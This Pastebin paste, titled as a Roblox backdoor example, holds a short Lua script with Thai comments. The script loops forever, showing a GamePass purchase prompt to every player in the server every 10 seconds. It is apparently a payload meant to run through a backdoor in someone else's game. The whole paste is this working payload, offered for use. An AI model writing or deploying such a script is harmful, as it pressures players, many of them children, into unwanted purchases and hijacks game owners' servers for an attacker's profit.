Advertisement
SigmaBoy456

backdoor roblox Example 2874

Aug 28th, 2024
195
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.14 KB | None | 0 0
  1. -- ประกาศตัวแปร market เพื่อเก็บการเรียกใช้บริการ MarketplaceService ในเกม
  2. local market = game:GetService("MarketplaceService")
  3.  
  4. -- ประกาศตัวแปร id เพื่อเก็บ ID ของ GamePass ที่ต้องการโปรโมท
  5. local id = 1234567
  6.  
  7. -- เริ่มลูปที่ไม่มีที่สิ้นสุด
  8. while true do
  9. -- วนลูปผ่านผู้เล่นทุกคนในเกม
  10. for _, v in pairs(game.Players:GetPlayers()) do
  11. -- ตรวจสอบว่าผู้เล่น v มีค่าอยู่หรือไม่
  12. if v then
  13. -- กระตุ้นให้ผู้เล่น v ทำการซื้อ GamePass ที่มี ID ตามตัวแปร id
  14. market:PromptGamePassPurchase(v, id)
  15. -- รอเวลา 10 วินาที ก่อนที่จะวนลูปไปยังผู้เล่นคนถัดไป
  16. wait(10)
  17. end
  18. end
  19. end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement